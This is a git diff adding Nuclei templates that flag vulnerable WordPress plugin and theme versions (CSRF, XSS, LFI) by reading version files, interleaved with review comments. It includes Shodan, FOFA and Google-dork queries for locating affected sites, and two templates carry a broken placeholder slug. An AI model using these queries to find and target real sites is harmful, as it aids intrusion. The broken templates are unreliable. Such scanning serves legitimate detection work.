diff --git a/poc/cve/CVE-2023-40068-23426c249d4590c183980f57ce680dee.yaml b/poc/cve/CVE-2023-40068-23426c249d4590c183980f57ce680dee.yaml new file mode 100644 index 0000000000..e41c148c32 --- /dev/null +++ b/poc/cve/CVE-2023-40068-23426c249d4590c183980f57ce680dee.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-40068-23426c249d4590c183980f57ce680dee + +info: + name: > + Advanced Custom Fields <= 6.3.5 - Authenticated Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/51178e18-ae8b-4a7f-974d-23346a8dbc52?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: CVE-2023-40068 + metadata: + fofa-query: "wp-content/plugins/UNKNOWN-CVE-2023-40068-1/" + google-query: inurl:"/wp-content/plugins/UNKNOWN-CVE-2023-40068-1/" + shodan-query: 'vuln:CVE-2023-40068' + tags: cve,wordpress,wp-plugin,UNKNOWN-CVE-2023-40068-1,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/UNKNOWN-CVE-2023-40068-1/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "UNKNOWN-CVE-2023-40068-1" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.3.5') \ No newline at end of file diff --git a/poc/cve/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml b/poc/cve/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml new file mode 100644 index 0000000000..41f54160b7 --- /dev/null +++ b/poc/cve/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml 
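Review bot: The `path`, `words`, `fofa-query`, `google-query` and `tags` fields all use the placeholder slug `UNKNOWN-CVE-2023-40068-1`, so the template requests `/wp-content/plugins/UNKNOWN-CVE-2023-40068-1/readme.txt`, which no install serves; as written it can never match and should not ship. The title names Advanced Custom Fields, whose wordpress.org slug is `advanced-custom-fields`, so that value belongs in the path, the word matcher and the queries. The Wordfence reference id 51178e18-ae8b-4a7f-974d-23346a8dbc52 is the same one cited by the CVE-2024-45429 template later in this commit, so one of the two `cve-id` values is probably mislinked and should be checked against the advisory; CVE-2024-45429 carries the same placeholder slug and needs the same fix.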
@@ -0,0 +1,59 @@ +id: CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b + +info: + name: > + Login Screen Manager <= 3.5.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Login Screen Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.5.2. This is due to missing or incorrect nonce validation on the cwlsm_options_page() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/288db6ba-5d6c-448d-85c5-f9a19a9391c0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-47182 + metadata: + fofa-query: "wp-content/plugins/login-screen-manager/" + google-query: inurl:"/wp-content/plugins/login-screen-manager/" + shodan-query: 'vuln:CVE-2023-47182' + tags: cve,wordpress,wp-plugin,login-screen-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-screen-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-screen-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml b/poc/cve/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml new file mode 100644 index 0000000000..6b1a713e63 
--- /dev/null +++ b/poc/cve/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07 + +info: + name: > + Web Directory Free <= 1.7.2 - Unauthenticated Local File Inclusion + author: topscoder + severity: critical + description: > + The Web Directory Free plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.7.2 via the w2dc_isTemplate() function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d80ab1a4-19f9-4fea-87b4-1d2ba465e860?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-3673 + metadata: + fofa-query: "wp-content/plugins/web-directory-free/" + google-query: inurl:"/wp-content/plugins/web-directory-free/" + shodan-query: 'vuln:CVE-2024-3673' + tags: cve,wordpress,wp-plugin,web-directory-free,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/web-directory-free/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "web-directory-free" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-38763-36ed147d9204dfa5b9ca29204c678752.yaml b/poc/cve/CVE-2024-38763-36ed147d9204dfa5b9ca29204c678752.yaml new file mode 100644 index 0000000000..3858945c82 --- /dev/null +++ b/poc/cve/CVE-2024-38763-36ed147d9204dfa5b9ca29204c678752.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-38763-36ed147d9204dfa5b9ca29204c678752 + +info: + name: > + Popularis Verse <= 1.0.1 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Popularis Verse theme for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14250ff2-66e4-48f9-8f73-7f245079134c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-38763 + metadata: + fofa-query: "wp-content/themes/popularis-verse/" + google-query: inurl:"/wp-content/themes/popularis-verse/" + shodan-query: 'vuln:CVE-2024-38763' + tags: cve,wordpress,wp-theme,popularis-verse,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/popularis-verse/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "popularis-verse" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file 
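Review bot: The `version` regex `(?mi)Version: ([0-9.]+)` is unanchored, so with the `i` flag it captures the first `version:` token anywhere in `style.css` rather than the theme header's `Version:` line, and a stylesheet that mentions another version string earlier would feed a wrong value to `compare_versions`. Anchoring it to the start of a line, `"(?mi)^Version: ([0-9.]+)"`, pins it to the header field without changing anything else. The same regex is used in the CVE-2024-5567 (betheme) template. Whether nuclei's DSL treats an empty `version` as a match for `compare_versions(version, '<= 1.0.1')` when the regex misses is worth checking, since under `matchers-condition: and` that matcher is what prevents a bare 200 from being reported.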
diff --git a/poc/cve/CVE-2024-3899-f75ea98633e652b4cb25f75a92267ca3.yaml b/poc/cve/CVE-2024-3899-f75ea98633e652b4cb25f75a92267ca3.yaml new file mode 100644 index 0000000000..bef4813c0f --- /dev/null +++ b/poc/cve/CVE-2024-3899-f75ea98633e652b4cb25f75a92267ca3.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-3899-f75ea98633e652b4cb25f75a92267ca3 + +info: + name: > + Gallery Plugin for WordPress – Envira Photo Gallery <= 1.8.14 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Gallery Plugin for WordPress – Envira Photo Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the gallery image title field in all versions up to, and including, 1.8.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6788b92c-8a2c-4ebb-85ca-eb1fd0f3b0e0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-3899 + metadata: + fofa-query: "wp-content/plugins/envira-gallery-lite/" + google-query: inurl:"/wp-content/plugins/envira-gallery-lite/" + shodan-query: 'vuln:CVE-2024-3899' + tags: cve,wordpress,wp-plugin,envira-gallery-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/envira-gallery-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "envira-gallery-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.14') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43255-91eefecce0a74f93379bfae7b9f8769a.yaml b/poc/cve/CVE-2024-43255-91eefecce0a74f93379bfae7b9f8769a.yaml new file mode 100644 index 0000000000..845ddb5fbe --- /dev/null +++ b/poc/cve/CVE-2024-43255-91eefecce0a74f93379bfae7b9f8769a.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43255-91eefecce0a74f93379bfae7b9f8769a + +info: + name: > + MyBookTable Bookstore <= 3.4.0 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The MyBookTable Bookstore plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4.0. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to update plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b614aab2-a3e3-410a-917b-cc33634503ce?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43255 + metadata: + fofa-query: "wp-content/plugins/mybooktable/" + google-query: inurl:"/wp-content/plugins/mybooktable/" + shodan-query: 'vuln:CVE-2024-43255' + tags: cve,wordpress,wp-plugin,mybooktable,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mybooktable/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mybooktable" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-45269-87676ca600bde6a78ec815da9ddc8eb7.yaml b/poc/cve/CVE-2024-45269-87676ca600bde6a78ec815da9ddc8eb7.yaml new file mode 100644 index 0000000000..66cc08ce9c --- /dev/null 
+++ b/poc/cve/CVE-2024-45269-87676ca600bde6a78ec815da9ddc8eb7.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-45269-87676ca600bde6a78ec815da9ddc8eb7 + +info: + name: > + Carousel Slider <= 1.10.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Carousel Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.10.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to manipulate data from the image selection feature via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d372fbca-47c8-45b8-b5cb-83b8367860f4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-45269 + metadata: + fofa-query: "wp-content/plugins/carousel-slider/" + google-query: inurl:"/wp-content/plugins/carousel-slider/" + shodan-query: 'vuln:CVE-2024-45269' + tags: cve,wordpress,wp-plugin,carousel-slider,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/carousel-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "carousel-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.10.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-45270-ff7911032b65570055c615564e945f75.yaml b/poc/cve/CVE-2024-45270-ff7911032b65570055c615564e945f75.yaml new file mode 100644 index 0000000000..fa277e7535 
--- /dev/null +++ b/poc/cve/CVE-2024-45270-ff7911032b65570055c615564e945f75.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-45270-ff7911032b65570055c615564e945f75 + +info: + name: > + Carousel Slider <= 2.2.3 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Carousel Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.3. This is due to missing or incorrect nonce validation on the add_slide_template() function. This makes it possible for unauthenticated attackers to add slides via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dbc60daa-c093-4cd6-8f07-d9015e2bd957?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-45270 + metadata: + fofa-query: "wp-content/plugins/carousel-slider/" + google-query: inurl:"/wp-content/plugins/carousel-slider/" + shodan-query: 'vuln:CVE-2024-45270' + tags: cve,wordpress,wp-plugin,carousel-slider,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/carousel-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "carousel-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-45429-c5b50a2727f0a5beb04680b6d713ea8e.yaml b/poc/cve/CVE-2024-45429-c5b50a2727f0a5beb04680b6d713ea8e.yaml new file mode 100644 index 0000000000..6a65360ada 
--- /dev/null +++ b/poc/cve/CVE-2024-45429-c5b50a2727f0a5beb04680b6d713ea8e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-45429-c5b50a2727f0a5beb04680b6d713ea8e + +info: + name: > + Advanced Custom Fields <= 6.3.5 - Authenticated Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Advanced Custom Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via field groups in all versions up to, and including, 6.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with the 'capability' setting privilege, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/51178e18-ae8b-4a7f-974d-23346a8dbc52?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 5.5 + cve-id: CVE-2024-45429 + metadata: + fofa-query: "wp-content/plugins/UNKNOWN-CVE-2023-40068-1/" + google-query: inurl:"/wp-content/plugins/UNKNOWN-CVE-2023-40068-1/" + shodan-query: 'vuln:CVE-2024-45429' + tags: cve,wordpress,wp-plugin,UNKNOWN-CVE-2023-40068-1,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/UNKNOWN-CVE-2023-40068-1/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "UNKNOWN-CVE-2023-40068-1" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.3.5') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml b/poc/cve/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml new file mode 100644 index 0000000000..fd670e2f81 --- /dev/null +++ b/poc/cve/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5 + +info: + name: > + Forminator Forms – Contact Form, Payment Form & Custom Form Builder <= 1.34.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.34.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/64e14944-db83-413f-82a3-cda594398c7e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-45625 + metadata: + fofa-query: "wp-content/plugins/forminator/" + google-query: inurl:"/wp-content/plugins/forminator/" + shodan-query: 'vuln:CVE-2024-45625' + tags: cve,wordpress,wp-plugin,forminator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "forminator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.34.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5561-b3779d524422cb5f6e75ef5f028e49f8.yaml b/poc/cve/CVE-2024-5561-b3779d524422cb5f6e75ef5f028e49f8.yaml new file mode 100644 index 0000000000..fc3fd756a0 --- /dev/null 
+++ b/poc/cve/CVE-2024-5561-b3779d524422cb5f6e75ef5f028e49f8.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5561-b3779d524422cb5f6e75ef5f028e49f8 + +info: + name: > + Popup Maker <= 1.19.0 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.19.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f111c87e-e1e8-45df-ab92-0a81e32467b4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-5561 + metadata: + fofa-query: "wp-content/plugins/popup-maker/" + google-query: inurl:"/wp-content/plugins/popup-maker/" + shodan-query: 'vuln:CVE-2024-5561' + tags: cve,wordpress,wp-plugin,popup-maker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/popup-maker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "popup-maker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.19.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-5567-a55055fd86860f71a8b1255aa0514d09.yaml b/poc/cve/CVE-2024-5567-a55055fd86860f71a8b1255aa0514d09.yaml new file mode 100644 index 0000000000..76d584ea08 --- /dev/null +++ b/poc/cve/CVE-2024-5567-a55055fd86860f71a8b1255aa0514d09.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-5567-a55055fd86860f71a8b1255aa0514d09 + +info: + name: > + Betheme | Responsive Multipurpose WordPress & WooCommerce Theme <= 27.5.5 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File + author: topscoder + severity: low + description: > + The Betheme theme for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 27.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5dfaa23f-05df-423c-a5f6-02f2b714b5b6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5567 + metadata: + fofa-query: "wp-content/themes/betheme/" + google-query: inurl:"/wp-content/themes/betheme/" + shodan-query: 'vuln:CVE-2024-5567' + tags: cve,wordpress,wp-theme,betheme,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/betheme/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "betheme" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 27.5.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml b/poc/cve/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml new file mode 100644 index 0000000000..e59c486d50 --- /dev/null 
+++ b/poc/cve/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-5628-1341f1db3b0e886d8e7026974e839398 + +info: + name: > + Avada | Website Builder For WordPress & eCommerce <= 3.11.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via fusion_button Shortcode + author: topscoder + severity: low + description: > + The Avada | Website Builder For WordPress & eCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's fusion_button shortcode in all versions up to, and including, 3.11.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in 3.11.9. Additional hardening for alternate attack vectors was added to version 3.11.10. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7c23bd29-ba02-4c90-a631-5ce6294d7760?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5628 + metadata: + fofa-query: "wp-content/plugins/fusion-builder/" + google-query: inurl:"/wp-content/plugins/fusion-builder/" + shodan-query: 'vuln:CVE-2024-5628' + tags: cve,wordpress,wp-plugin,fusion-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fusion-builder/languages/fusion-builder.pot" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Project-Id-Version: Avada Builder ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Project-Id-Version: Avada Builder ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fusion-builder" + part: body + + - 
type: dsl + dsl: + - compare_versions(version, '<= 3.11.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5789-aefcab5998ef352002c627c10b26cbb1.yaml b/poc/cve/CVE-2024-5789-aefcab5998ef352002c627c10b26cbb1.yaml new file mode 100644 index 0000000000..78125c2d67 --- /dev/null +++ b/poc/cve/CVE-2024-5789-aefcab5998ef352002c627c10b26cbb1.yaml 
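Review bot: The version is taken from `languages/fusion-builder.pot` via `Project-Id-Version: Avada Builder ([0-9.]+)`, and a .pot header is only refreshed when the translation catalogue is regenerated, so it may lag behind the installed plugin version and misclassify sites near the `<= 3.11.9` boundary; reading the plugin's own version header (the readme `Stable tag:` line the other plugin templates in this commit use) would be more reliable if this package ships one. The description also says the issue was only partially fixed in 3.11.9 with further hardening in 3.11.10, so a comment next to the matcher such as `# 3.11.9 is still listed as affected; 3.11.10 added hardening for alternate vectors` would explain why the cut-off is not 3.11.10.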
@@ -0,0 +1,59 @@ +id: CVE-2024-5789-aefcab5998ef352002c627c10b26cbb1 + +info: + name: > + Triton Lite <= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Button Shortcode + author: topscoder + severity: low + description: > + The Triton Lite theme for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute within the theme's Button shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/049efe5a-3f68-46ad-b73a-1892f03c9d1d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5789 + metadata: + fofa-query: "wp-content/themes/triton-lite/" + google-query: inurl:"/wp-content/themes/triton-lite/" + shodan-query: 'vuln:CVE-2024-5789' + tags: cve,wordpress,wp-theme,triton-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/triton-lite/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "triton-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5867-c6c99bf3f91229f19ab5549c865f8aea.yaml b/poc/cve/CVE-2024-5867-c6c99bf3f91229f19ab5549c865f8aea.yaml new file mode 100644 index 0000000000..77021e6bb9 --- /dev/null 
